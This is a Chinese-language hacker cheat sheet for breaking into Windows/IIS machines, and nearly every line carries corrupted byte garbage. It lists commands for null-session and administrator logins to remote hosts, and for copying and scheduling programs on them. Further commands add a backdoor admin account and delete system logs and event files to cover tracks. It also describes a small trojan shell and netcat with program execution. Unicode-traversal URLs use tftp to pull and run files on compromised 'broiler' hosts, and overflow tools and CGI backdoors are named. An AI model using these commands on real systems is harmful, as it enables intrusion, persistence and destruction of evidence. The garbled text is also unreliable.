网管和黑客都必须知道的命令
k�h2TD�xa& 常用的几条NET命令:
����.��Wy' 4
l-Ur�n�Z (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
Tq?��Ai_�
q�Tdwi?j_� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
{ AYW
C6Y�
�F;}JSb"� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
-)')PV��_+ 0z�S�z[;�A (查看远程主机时间) net time \\IP地址
NW`.�7'aWT �2zh�-�m�s (定时启动某个程序) at \\IP地址 02:18 readme.exe
<,n:w[+!`P �4m91X�D�� (查看共享) net view \\IP地址
V,d\Wk��k/ �O_4B>
)zd (查看netbios工作组列表) nbtstat -A IP地址
�j�aKW[@<� ��<��4�vCx (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�j��K*�d� 4OgH+<G�� (这两条把自己增加到管理员组): net user 用户名 密码 /add
yF��.Gz`yi �g�H'h�A�' net localgroup Administrators 用户名 /add
j�I�*�@&�3 wS�#��Uw_[ (断开连接) net use \\IP地址\ipc$ /delete
2s�k7E'2(� ``:�[J�r�& 扫尾:
uyB��2� � T��aHcvjhR del C:\winnt\system32\logfiles\*.*
_�LC*_LT_� v� G\�J8�s del C:\winnt\ssytem32\config\*.evt
�37a1�O>�A ��z+6��PVQ del C:\winnt\system32\dtclog\*.*
A-=hv�J�5T WH1�"� HO� del C:\winnt\system32\*.log
C5I7\�9F) uK"FopUJ4i del C:\winnt\system32\*.txt
��'�F.P93 sRT H�_�]c del C:\winnt\*.txt
�ppvlU H5; !8�[A;+o3P del C:\winnt\*.log
��}s<�;YC� ?z� l<"�u� 一、netsvc.exe
-wV2
79^�b iz`>'�wp�C 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
hB.8\-}QMq s_f�e���4K netsvc /list \\IP地址
��@!!�u>1 ZlMT) ~fM& netsvc schedule \\IP地址 /query
n~�|?�)EL� k�i@�C}T�5 netsvc \\IP地址 schedule /start
H�8��? Y{H ui#��nN��� 二、OpenTelnet.exe
.H��q�q!�& o)@��nnqa� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�kG!�hq�j xlwf� @XW� OpenTelnet \\IP地址 用户名 密码 1 7878
�Nr2,m"�R{ ��+<F3}]�] 然后就可以telnet到主机的7878端口,进入DOS方式下:
P��Ls`Ci|` tR�'RB@k�J telnet IP地址 7878
�M`'D��D-Q 8�Z9>h:c�1 三、winshell.exe
�'ZM�h�<M[ �{�._'Q�[� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
_�%D7D~2r| e8x�q`:4Y� p Path (查看winshell主程序的路径信息)
<��%uEWb)� ?VE'�!DW� b reBoot (重新启动机器)
l_���:P�|� Nr�>UZ�lU8 d shutDown (关闭机器)
L{F]uz_�[x �j��w�E��= s Shell (执行后你就会看到可爱的“C:\>”)
�<Y}m/-sD5 zE$HHY2ovi x eXit (退出本次登录会话,此命令并不终止winshell的运行)
;2��`6�eyr ,IboPh&Q78 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
v8y�C�f7+" �{�*GBU�v5 四、3389登陆器,GUI方式登录远程主机的
_h}�(j�Ed! *m�<[ s��S 五、elsave.exe
U;����� m@ p+]S)K GZw 事件日志清除工具
ANw�1P{9�* Q2m��[XcnX elsave -s \\IP地址 -l "application" -C
m6�BU�KX\m I����i[�U% elsave -s \\IP地址 -l "system" -C
;u'VR}4p�h MW rhV�n{R elsave -s \\IP地址 -l "security" -C
kGA�g�XtE m�m:��TR?^ 执行后成功清除应用程序日志,系统日志,安全日志
)Wq1�af�
� ^il$t�]X5- 六、hbulot.exe
:h3�4mNU�� ��v {HF�}L 开启win2kserver和winxp的3389服务
�z��i6J|u� ��6�z� U� hbulot [/r]
n8;�L_�43U xk>cd�g�t� 使用/r表示安装完成后自动重起目标使设置生效。
\^�d�se�� }W�C[�<AqI 七、nc.exe(netcat.exe)
eUN�aq&�M� cK]n"6N��[ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
>KrI}>�!9r IW<rmP�=R& 想要连接到某处: nc [-options] hostname port[s] [ports] ...
�&M?b��08 EEZ~Bs��}d 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�lF���/
Xs ����Qv�~�@ 参数:
-��9{�N7H� �/fT"WaTEK -e prog 程序重定向,一旦连接,就执行 [危险!!]
M]{�~T�7n- v0)Y,�hW�� -g gateway source-routing hop point[s], up to 8
QlM�L�Wi�� �� �]��aF; -G num source-routing pointer: 4, 8, 12, ...
>@ 8'C�"F� _4��Eq_w`� -h 帮助信息
d9�TTAa��f Y3[KS;_fr9 -i secs 延时的间隔
i3�|xd�Ye$ 8/)\nV$0�Y -l 监听模式,用于入站连接
`H:`JBe=+[ �u,8)M'�UU -n 指定数字的IP地址,不能用hostname
k�l�Qmo30i �+�:jonN9d -o file 记录16进制的传输
>�uY�Qt�~s �8493Sw��� -p port 本地端口号
�$)ka1L"�N I[�K4�/9�1 -r 任意指定本地及远程端口
AH'�c:w�]~ !��zOj`lx -s addr 本地源地址
)HE{`�yiLL TX$dx�HSPK -u UDP模式
u=�qK_$�d4 )m��
=xf1� -v 详细输出——用两个-v可得到更详细的内容
y�$-@|M$GG y��]@JkF�( -w secs timeout的时间
I(R%j]LX&� \)u��A:v� -z 将输入输出关掉——用于扫描时
�2=K�|k�p5 八、TFTPD32.EXE
sHBT�B6)lx �ghB&wOm/� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
6ZHeAb]�"� 3^�w�HL�:u http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
!�6X6_ +}M P�/ �6$TgQ 然后可以直接令文件运行:
�MCibYv�c[ �dY�D;Z<�l http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
hq��{{�XQ zL+t�&P[\� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
Ip7#${f5�M "!�vY{�9, 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
n�!Y_SPg
� �v+{{j|x�= 一、一 Xscan命令行运行参数说明:
ELnUpmv�\ �$k&v
juB. 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
VV1sadS:S` �&D{�!zF�� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
Z�lC+DXg#S H�m'fK$�y( xscan -file <主机列表文件名> <检测项目> [其他选项]
"TaLvworb4 *8,W$pe3�� 其中<检测项目> 含义如下:
B`R@%U��S� 9kWI2cLzQt -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
|�k}L�=oWE Vv�(b�u�G� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
��FD E?O]^ >i������ -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
3]kM&lK5\ �7P�(�o!%H -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�o�S%(~])\ ldp9+��7n~ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
y[l{
UBue: I>n�YI�|o1 [其他选项] 含义如下:
Ek �`bPQ5� ���.GJbr�z -v: 显示详细扫描进度
ly34aD/p~, q�
6UZ`9&z -p: 跳过Ping不通的主机
lbt8�S�.fx D��1�-w>Y# -o: 跳过没有检测到开放端口的主机
�pm=O.)g4` �Ag\RLJ.KD -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
